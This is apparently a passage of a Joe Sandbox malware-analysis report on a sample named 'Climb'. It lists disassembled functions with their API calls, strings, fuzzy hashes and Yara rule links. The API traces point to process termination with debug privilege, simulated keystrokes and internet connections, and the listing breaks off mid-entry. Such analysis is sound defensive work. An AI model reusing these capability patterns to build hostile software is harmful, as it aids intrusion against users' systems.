Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 9a3893acd1c0a7228faad1b622474a66ed0113c0a0b84ae9563d6afca38cc103
Instruction ID: ae9793cebd21a42bafcc2ecaca7a169b943066f2018d2862b0eb53503144523e
Opcode Fuzzy Hash: 9a3893acd1c0a7228faad1b622474a66ed0113c0a0b84ae9563d6afca38cc103
Instruction Fuzzy Hash: FC1106B6244347B9FA246322ED06EEB3B9CDF66729B20002BF504E50D2FFED6801551D

Function 00487567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0048758D
GetWindowRect.USER32(?,?), ref: 004875CE
ScreenToClient.USER32(?,?), ref: 004875F6
GetClientRect.USER32(?,?), ref: 0048773A
GetWindowRect.USER32(?,?), ref: 0048775B

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 99f9ebf9609e32a04521dc0d642485c7c9913a2971e49ced7c98cd4c555d7f4e
Instruction ID: 066575d97cc8e0a8d36ae9f61c2fadad846a3ab18eacfe0f83da5ca327910845
Opcode Fuzzy Hash: 99f9ebf9609e32a04521dc0d642485c7c9913a2971e49ced7c98cd4c555d7f4e
Instruction Fuzzy Hash: FAC15D3990464AEFDB10DFA8C580BEEB7F1FF18310F24841AE895A7250D738E951DB65

Function 004BD210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 004BD237
_free.LIBCMT ref: 004BD2A2
_free.LIBCMT ref: 004BD2C8
_free.LIBCMT ref: 004BD2F1
_free.LIBCMT ref: 004BD329
_free.LIBCMT ref: 004BD35A
_free.LIBCMT ref: 004BD39B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 004BD41C
_free.LIBCMT ref: 004BD435

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: c244acbc34b44d0ba525787ab330b7122d427faee7f3775f0ce264739001bd8f
Instruction ID: 0510bdc9e5e17594626520eb08f4f535e4bef0ede4428cfd38931ec0f374eaaf
Opcode Fuzzy Hash: c244acbc34b44d0ba525787ab330b7122d427faee7f3775f0ce264739001bd8f
Instruction Fuzzy Hash: C361F471E04741AFDB25AF79D8817EB7BA49F11324F0405EFE80497286EA7D9801877D

Function 004FCB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004FCBC7
GetLastError.KERNEL32 ref: 004FCBDA
SetEvent.KERNEL32(?), ref: 004FCBEE

Part of subcall function 004FCC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 004FCCB7
Part of subcall function 004FCC98: GetLastError.KERNEL32 ref: 004FCD67
Part of subcall function 004FCC98: SetEvent.KERNEL32(?), ref: 004FCD7B
Part of subcall function 004FCC98: InternetCloseHandle.WININET(00000000), ref: 004FCD86

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 4ccda9f940c8e5cd0827d3532a4a27714ca8ea54f2a8788fea4aec29a88cf7bb
Instruction ID: 3b0b8e0abcd6a3371b91a824e28f2d3ccbbe2f1da867bb6d46d75b17306c8696
Opcode Fuzzy Hash: 4ccda9f940c8e5cd0827d3532a4a27714ca8ea54f2a8788fea4aec29a88cf7bb
Instruction Fuzzy Hash: 48316D7150074DAFDB219F65DE84AB7BBF8FF14304B04852EFA6A82610C739E815EB64

Function 004E2EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 004E4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 004E43AD
Part of subcall function 004E4393: GetCurrentThreadId.KERNEL32 ref: 004E43B4
Part of subcall function 004E4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004E2F00), ref: 004E43BB

MapVirtualKeyW.USER32(00000025,00000000), ref: 004E2F0A
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004E2F28
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 004E2F2C
MapVirtualKeyW.USER32(00000025,00000000), ref: 004E2F36
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 004E2F4E
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 004E2F52
MapVirtualKeyW.USER32(00000025,00000000), ref: 004E2F5C
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 004E2F70
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 004E2F74

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: e415c6d0d6060ebb707a4ee71ab9d997208949b0574a6968c4bd113c6f5f1348
Instruction ID: ea1cbce7b40b459d551eba7bca885b029d6a6010025b7b9e5196ea0db47147b5
Opcode Fuzzy Hash: e415c6d0d6060ebb707a4ee71ab9d997208949b0574a6968c4bd113c6f5f1348
Instruction Fuzzy Hash: 5A01D8307846107BFB10676A9C8AF997F69DB5DB12F104016F318AE1E4C9E15444DAB9

Function 004E2150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,004E1D95,?,?,00000000), ref: 004E2159
HeapAlloc.KERNEL32(00000000,?,004E1D95,?,?,00000000), ref: 004E2160
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,004E1D95,?,?,00000000), ref: 004E2175
GetCurrentProcess.KERNEL32(?,00000000,?,004E1D95,?,?,00000000), ref: 004E217D
DuplicateHandle.KERNEL32(00000000,?,004E1D95,?,?,00000000), ref: 004E2180
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,004E1D95,?,?,00000000), ref: 004E2190
GetCurrentProcess.KERNEL32(004E1D95,00000000,?,004E1D95,?,?,00000000), ref: 004E2198
DuplicateHandle.KERNEL32(00000000,?,004E1D95,?,?,00000000), ref: 004E219B
CreateThread.KERNEL32(00000000,00000000,004E21C1,00000000,00000000,00000000), ref: 004E21B5

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: fe0135de0b8a7415654d611918a56ae5eb67ab7f66d4e021d98d5a54ca239fde
Instruction ID: a7202b4f022f167517fc80a0e3cfd769c6de47d596cc801a013d3170844bcdc2
Opcode Fuzzy Hash: fe0135de0b8a7415654d611918a56ae5eb67ab7f66d4e021d98d5a54ca239fde
Instruction Fuzzy Hash: 2C01BBB5280344BFE710AFA5DC4DFAB7BACEB98711F008411FA05DB1A1CAB59804DB30

Function 004ECE7B Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004841EA: _wcslen.LIBCMT ref: 004841EF

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004ECF99
_wcslen.LIBCMT ref: 004ECFE0
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004ED047
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 004ED075

Strings

<*U, xrefs: 004ECEF6
,*U, xrefs: 004ECF0C
0, xrefs: 004ECF5A

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: ,*U$0$<*U
API String ID: 1227352736-3502272511
Opcode ID: b44dd138f49c998924e7829518edc0f0199af9b547a4a96eba26ff10d99830a2
Instruction ID: b56684d8fd21806e4328fd0220da41156f29c38e54850713822a28b91b03934b
Opcode Fuzzy Hash: b44dd138f49c998924e7829518edc0f0199af9b547a4a96eba26ff10d99830a2
Instruction Fuzzy Hash: 1751F431A043809FD714AF2AC885B6F77E4AF5531AF080A2FF991D32D1DB78C946875A

Function 0050AB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 004EDD87: CreateToolhelp32Snapshot.KERNEL32 ref: 004EDDAC
Part of subcall function 004EDD87: Process32FirstW.KERNEL32(00000000,?), ref: 004EDDBA
Part of subcall function 004EDD87: CloseHandle.KERNEL32(00000000), ref: 004EDE87

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0050ABCA
GetLastError.KERNEL32 ref: 0050ABDD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0050AC10
TerminateProcess.KERNEL32(00000000,00000000), ref: 0050ACC5
GetLastError.KERNEL32(00000000), ref: 0050ACD0
CloseHandle.KERNEL32(00000000), ref: 0050AD21

Strings

SeDebugPrivilege, xrefs: 0050ABEC

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 0f301cb3b8ff7ba367bbd80d11d83538f7cca549ad3d6b1a803a1966a88fe81e
Instruction ID: 9e1d2262691cf3f4f1c43c57b4f52890210215f99bbef7975d506ce337a55de1
Opcode Fuzzy Hash: 0f301cb3b8ff7ba367bbd80d11d83538f7cca549ad3d6b1a803a1966a88fe81e
Instruction Fuzzy Hash: 1661AB31204341AFE320DF15C494F29BBA1BF54308F55889DE4664BBE2C775EC89CB92

Function 004EC625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004EC6C4
IsMenu.USER32(00000000), ref: 004EC6E4
CreatePopupMenu.USER32 ref: 004EC71A
GetMenuItemCount.USER32(015AFB88), ref: 004EC76B
InsertMenuItemW.USER32(015AFB88,?,00000001,00000030), ref: 004EC793

Strings

2, xrefs: 004EC6FE
0, xrefs: 004EC66F

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: c7280efd19e39144e53616049acbad2654826aff501067ddcce6baa9e9b6faed
Instruction ID: 7a776a1f7bbb03bc0c7a07177bc2f6a50fffd23b83e2be1d8b74c231a746d4fe
Opcode Fuzzy Hash: c7280efd19e39144e53616049acbad2654826aff501067ddcce6baa9e9b6faed
Instruction Fuzzy Hash: DA51CE71A002869BDF10CF7AC8C4BAEBBF5AF54319F24811BE81197390D3789946CF69

Function 004819CD Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 004819E1
ScreenToClient.USER32(00000000,?), ref: 004819FE
GetAsyncKeyState.USER32(00000001), ref: 00481A23
GetAsyncKeyState.USER32(00000002), ref: 00481A3D

Strings

$'H, xrefs: 004C318D, 004C31C3, 004C3164
$'H, xrefs: 004819F0, 00481A07, 004C3135

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID: $'H$$'H
API String ID: 4210589936-1717717349
Opcode ID: acb56960867e04b8d4eb8d40bc1e0ed81a5122f80da86c61170ddbb7d8a37e52
Instruction ID: 745eaa581c95cafd1d478f46e6ad43500948ed02b9f50b08e4195032562e0b54
Opcode Fuzzy Hash: acb56960867e04b8d4eb8d40bc1e0ed81a5122f80da86c61170ddbb7d8a37e52
Instruction Fuzzy Hash: 6841B37460410AFFDF09AF64C844BFEB774FB05324F24871BE429A22A0CB386A55CB55

Function 005186FC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00518740
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00518765
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0051877D
GetSystemMetrics.USER32(00000004), ref: 005187A6
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,004FC1F2,00000000), ref: 005187C6

Part of subcall function 0048249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004824B0

GetSystemMetrics.USER32(00000004), ref: 005187B1

Strings

(U, xrefs: 00518709

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID: (U
API String ID: 2294984445-2725093197
Opcode ID: 9eb8539b99acd173d7a8259ee19e0698cb24fd414f3ec748dc2f9c2240b39490
Instruction ID: 541956b8d7ea04e43b0c34db61ac285c635801cdb5df419b3fa3ed735f199aa0
Opcode Fuzzy Hash: 9eb8539b99acd173d7a8259ee19e0698cb24fd414f3ec748dc2f9c2240b39490
Instruction Fuzzy Hash: 9121B0312103119FDB249F38CC48ABA3BB5FB45365F258B29F922C21E0EF318894DB60

Function 004ED11F Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 004ED1BE

Strings

question, xrefs: 004ED177
warning, xrefs: 004ED1A7
blank, xrefs: 004ED140
stop, xrefs: 004ED18F
info, xrefs: 004ED15F

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: bb2ba2ab90ea15d433e25fc1f838428a1562c498257d1bd298583d197de40e1c
Instruction ID: 7a68f0d682d82929315bd65ed6ee7ca731a2dc7432454d71f4e8b64a96c92622
Opcode Fuzzy Hash: bb2ba2ab90ea15d433e25fc1f838428a1562c498257d1bd298583d197de40e1c
Instruction Fuzzy Hash: A8112035A4C34ABEE7055B56DC82DEFBBACDF19765B10002BF900A62C2D7FC5A01416D

Function 004EE73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 004EE759
gethostname.WSOCK32(?,00000100), ref: 004EE773
gethostbyname.WSOCK32(?), ref: 004EE780
inet_ntoa.WSOCK32(?), ref: 004EE7C2
_strcat.LIBCMT ref: 004EE7D0
WSACleanup.WSOCK32 ref: 004EE7F5

Strings

0.0.0.0, xrefs: 004EE79E

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: de1192bc2476cf261cd4ad48ddde85d50d9ff27297caf2b23920b14f94ea19b9
Instruction ID: 41266a4f4c00e43e68eff83654a2f9838ce6ad884db3282ccd6e935a31366b2f
Opcode Fuzzy Hash: de1192bc2476cf261cd4ad48ddde85d50d9ff27297caf2b23920b14f94ea19b9
Instruction Fuzzy Hash: B911E4319001147BDB246762DC4AEDF77BCEF61715F01006AF545A6091EFBC8A85D668

Function 004EF630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 004EF641
_wcslen.LIBCMT ref: 004EF652
_wcslen.LIBCMT ref: 004EF690
_wcslen.LIBCMT ref: 004EF6C6
_wcslen.LIBCMT ref: 004EF6F6
_wcslen.LIBCMT ref: 004EF706
_wcslen.LIBCMT ref: 004EF742
_wcslen.LIBCMT ref: 004EF771

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: d621153a058d269a012c61b685e3b7448676af86d1bf1b31746a364d32ed68df
Instruction ID: ec43f67107576ef432fbfbbf3f645cb4413e5716327ca54ccd995345202fd9d5
Opcode Fuzzy Hash: d621153a058d269a012c61b685e3b7448676af86d1bf1b31746a364d32ed68df
Instruction Fuzzy Hash: 3D41D665C10514B5CB11EBFACC8AACFB3A8AF56310F01842BE51CE3121FB38D255C3AA

Function 0051379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 005137B7
GetDC.USER32(00000000), ref: 005137BF
GetDeviceCaps.GDI32(00000000,0000005A), ref: 005137CA
ReleaseDC.USER32(00000000,00000000), ref: 005137D6
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00513812
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00513823
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00516504,?,?,000000FF,00000000,?,000000FF,?), ref: 0051385E
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 0051387D

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: bc882e86848c114e0d7d690edcf4e234a0a732a8907e3079ba532f590d0b8b69
Instruction ID: c195a90b50786243c36d53bdc366484587acb19d00602a4c07653df259bb7c80
Opcode Fuzzy Hash: bc882e86848c114e0d7d690edcf4e234a0a732a8907e3079ba532f590d0b8b69
Instruction Fuzzy Hash: 6F318B76201214BFEB218F50CC89FEB3FA9FB59711F044065FE089A291D6B59D81C7B0

Function 00505A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00505A64
NULL Pointer assignment, xrefs: 00505A8B, 00505DE0

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 155f3832232460a6a744cd8d88759d05450f297472fc44fddeb9d084ab3bc658
Instruction ID: e51151099c6e1cab58304b298a55d950ce455fbea3e8477cb62a3db143e681e7
Opcode Fuzzy Hash: 155f3832232460a6a744cd8d88759d05450f297472fc44fddeb9d084ab3bc658
Instruction Fuzzy Hash: 7FD19175A0070A9FDF10DF68C885AAEBBB5FF48304F14856AE915AB281E770ED45CF60

Function 004C18A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,004C1B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 004C194E
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004C1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 004C19D1
